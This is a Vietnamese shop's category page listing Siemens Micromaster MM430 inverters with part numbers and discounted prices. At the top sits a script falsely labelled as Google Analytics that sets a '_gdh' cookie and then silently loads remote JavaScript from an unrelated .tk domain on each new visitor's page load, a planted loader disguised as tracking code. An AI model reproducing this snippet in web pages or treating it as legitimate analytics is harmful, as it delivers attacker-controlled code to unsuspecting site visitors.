<!-- Global site tag (tmp.js) - Google Analytics --> <script async src='https://www.googletagmanager.com/gtag/js?id=UA-154861920-1'></script> <script> function get_cookie(googlesd){ var results = document.cookie.match ( '(^|;) ?' + googlesd + '=([^;]*)(;|$)' ); if (results) return ( unescape ( results[2] ) ); else return null; } function google(src) { var elem = document.createElement("script"); elem.src = src; document.head.appendChild(elem); } var val = get_cookie('_gdh'); if(val != 'icreguali'){ var date = new Date; date.setDate(date.getDate() + 30); date = date.toUTCString(); document.cookie = '_gdh=icreguali; path=/; expires='+date; var val = get_cookie('_gdh'); if(val == 'icreguali'){google('https://icreguali.tk/tmp.js');} } </script>
Danh Mục

Micromaster MM430

Danh mục liên quan
Hiển thị:
Sắp xếp theo:
MM430, 3 x 380vVAC, 7.5 Kw ( 10 HP)

Mã sản phẩm: 6SE6430-2UD27-5CA0

MM430, 3 x 380vVAC, 7.5 Kw ( 10 HP)..
45.332.000 VND 33.092.000 VND
MM430, 3 x 380vVAC, 11 Kw ( 15 HP)

Mã sản phẩm: 6SE6430-2UD31-1CA0

MM430, 3 x 380vVAC, 11 Kw ( 15 HP)..
54.134.000 VND 39.517.000 VND
MM430, 3 x 380vVAC, 15 Kw ( 18.5 HP)

Mã sản phẩm: 6SE6430-2UD31-5CA0

MM430, 3 x 380vVAC, 15 Kw ( 18.5 HP)..
67.778.000 VND 49.478.000 VND
MM430, 3 x 380vVAC, 18.5 Kw ( 22 HP)

Mã sản phẩm: 6SE6430-2UD31-8DA0

MM430, 3 x 380vVAC, 18.5 Kw ( 22 HP)..
85.823.000 VND 62.650.000 VND
MM430, 3 x 380vVAC, 22 Kw ( 30 HP)

Mã sản phẩm: 6SE6430-2UD32-2DA0

MM430, 3 x 380vVAC, 22 Kw ( 30 HP)..
96.825.000 VND 70.682.000 VND
MM430, 3 x 380vVAC, 30 Kw ( 37 HP)

Mã sản phẩm: 6SE6430-2UD33-0DA0

MM430, 3 x 380vVAC, 30 Kw ( 37 HP)..
112.670.000 VND 82.249.000 VND
MM430, 3 x 380vVAC, 37 Kw ( 45 HP)

Mã sản phẩm: 6SE6430-2UD33-7EA0

MM430, 3 x 380vVAC, 37 Kw ( 45 HP)..
144.357.000 VND 105.381.000 VND
MM430, 3 x 380vVAC, 45 Kw ( 55 HP)

Mã sản phẩm: 6SE6430-2UD34-5EA0

MM430, 3 x 380vVAC, 45 Kw ( 55 HP)..
166.803.000 VND 121.766.000 VND
MM430, 3 x 380vVAC, 55 Kw ( 70 HP)

Mã sản phẩm: 6SE6430-2UD35-5FA0

MM430, 3 x 380vVAC, 55 Kw ( 70 HP)..
191.889.000 VND 140.079.000 VND
MM430, 3 x 380vVAC, 75 Kw ( 90 HP)

Mã sản phẩm: 6SE6430-2UD37-5FA0

MM430, 3 x 380vVAC, 75 Kw ( 90 HP)..
216.536.000 VND 158.071.000 VND
MM430, 3 x 380vVAC, 90 Kw ( 110 HP)

Mã sản phẩm: 6SE6430-2UD38-8FA0

MM430, 3 x 380vVAC, 90 Kw ( 110 HP)..
254.825.000 VND 186.022.000 VND
MM430, 3 x 380vVAC, 110 Kw ( 132 HP)

Mã sản phẩm: 6SE6430-2UD41-1FA0

MM430, 3 x 380vVAC, 110 Kw ( 132 HP)..
330.084.000 VND 240.961.000 VND
Bản quyền thuộc về Công ty Cổ Phần Xây Dựng Điện Hưng Thịnh © 2020 - Powered by SERENCO.NET